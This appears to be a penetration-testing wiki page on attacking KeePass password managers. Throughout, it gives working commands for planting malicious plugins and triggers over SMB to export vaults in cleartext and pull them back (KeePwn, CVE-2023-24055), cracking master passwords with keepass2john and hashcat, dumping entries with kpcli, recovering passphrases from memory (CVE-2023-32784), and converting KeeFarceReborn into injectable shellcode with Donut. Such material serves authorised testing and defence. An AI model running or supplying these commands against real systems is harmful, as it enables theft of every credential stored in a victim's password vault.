Password managers generate and securely store passwords of various services, safeguarding them under a single master password. This master password serves as the key to access all the stored passwords within the password manager.
However, misconfiguration and security flaws are found in these applications that let us access stored data. Various tools could be used during the enumeration stage to get sensitive data in password manager applications used by Internet browsers and desktop applications.
Practice
Enumeration
KeePwn (Python) can be used to remotely identify hosts that run KeePass on a target environment.
KeePass features a plugin framework which can be abused to load malicious DLLs into KeePass process, allowing attackers with administrator rights to easily export the database (see: KeeFarceRebornPlugin).
KeePwn (Python) can be used to abuse this KeePass Plugin feature, exporting the database in cleartext.
These actions are made through SMB C$ share access, limiting AV/EDR detection as no command execution is performed.
# List currently installed plugins and enumerate the plugin cache
python3 KeePwn.py plugin check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Add and remove your malicious plugins which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py plugin add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Poll %APPDATA% for exports and automatically moves it from remote host to local filesystem
python3 KeePwn.py plugin poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
By compiling the KeeFarceRebornPlugin project, and copying the DLL into the plugins directory (located at at KeePass root, namely "C:\Program Files\KeePass Password Safe 2\Plugins" for a global install), we can abuse KeePass Plugin.
We can modify the KeePass.config.xml file to create malicious triggers that automatically exported database entries to accessible locations.
This KeePass Trigger Abuse, identified as CVE-2023-24055 only affects KeePass versions 2.53 and earlier.
NetExec (Python) can be used to remotly check if keepass is installed on the target computer and then steal the master password trough KeePass Trigger and decrypt the database.
KeePwn (Python) can also be used to remotely abuse KeePass trigger in order to export the database in cleartext.
If the configuration file path is not the default location, you can specify one with --config-path argument.
# Check if a malicious trigger named "export" is currently written in KeePass configuration
python3 KeePwn.py trigger check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Add and remove a malicious trigger named "export" which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py trigger add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Poll %APPDATA% for exports and automatically moves it from remote host to local filesystem
python3 KeePwn.py trigger poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
Cracking KDBX Database Master Password
Cracking Master Password - Manually
If we gained access to the keepass database, we may be able to extract it and crack the master database password.
Keepass database is stored as a .kdbx file, we can search for such files using following commands:
One we exfiltrate the database to our attacking computer, we can start by using keepass2john and save the output hase a crackable hash.
keepass2john keepass.kdbx > keepass.hash
Then, we may crack the master password using hashcat. See this page for more details about cracking passwords.
hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user
Now, we can open the database using kpcli and dump passwords
$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/
kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry keepass.info
1. Sample Entry #2 keepass.info/help/kb/testform.
2. User Company Password
kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
Pass: Password
URL: https://keepass.info/
Notes: NotesCracking Master Password - NetExec
NetExec
(Python) can be used to remotly check if keepass is installed on the target computer and then steal the master password and decrypt the database !
nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover
Extract Passphrase from Memory - CVE-2023-32784
As described by @vdohney, it is possible to retrieve the database's master password in memory
This KeePass Abuse, identified as CVE-2023-32784 only affects KeePass versions priot to 2.54.
Fisrt, perform a process dump of the running KeePass
Retrieve the process dump as well as the .KDBX containing the encrypted database (e.g. through SMB).
KeePwn (Python) can then be used to search for potential master password candidates in dumps. Because the resulting strings will (by design) be incomplete, the module can also be used to bruteforce the missing first character against a specified KDBX file.
KeeFarceReborn is a standalone DLL that exports databases in cleartext once injected in the KeePass process.
After compiling the DLL, we may use Donut to convert it to a shellcode and use it with any injection technique.
donut "KeeFarceReborn.dll" -c KeeFarceReborn.Program -m Main -e 1
Post-injection steps
Once the injection is performed, you will see debug messages being printed in MessageBox (which should obviously be removed when used in a real penetration testing scenario) then find the exported database in the current user's %APPDATA% (choosed by default, as KeePass will be sure to have write access). The exported XML file can later be imported in any KeePass database without asking for a password
